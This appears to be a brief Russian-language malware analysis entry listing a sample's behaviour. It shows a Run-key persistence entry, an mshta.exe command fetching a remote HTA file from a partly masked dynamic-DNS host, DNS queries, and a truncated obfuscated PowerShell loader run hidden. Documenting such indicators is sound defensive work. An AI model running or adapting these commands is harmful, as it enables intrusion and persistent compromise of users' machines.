Техническая информация
- [<HKCU>\soFtWarE\micRosofT\WiNdOwS\CuRreNTveRsIOn\ruN] 'vnt' = 'C:\Users\Public\vnt.exe'
- '<SYSTEM32>\mshta.exe' http://fi####ost.sytes.net/out-1798826235.hta
- http://fi####ost.sytes.net/out-1798826235.hta
- DNS ASK fi####ost.sytes.net
- DNS ASK k0##a.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$xbvordlw = Get-Random -Min 3 -Max 4;$dhtfiokxcjw = ([char[]]([char]97..[char]122));$orhguizfkl = -join ($dhtfiokxcjw | Get-Random -Count $x...' (со скрытым окном)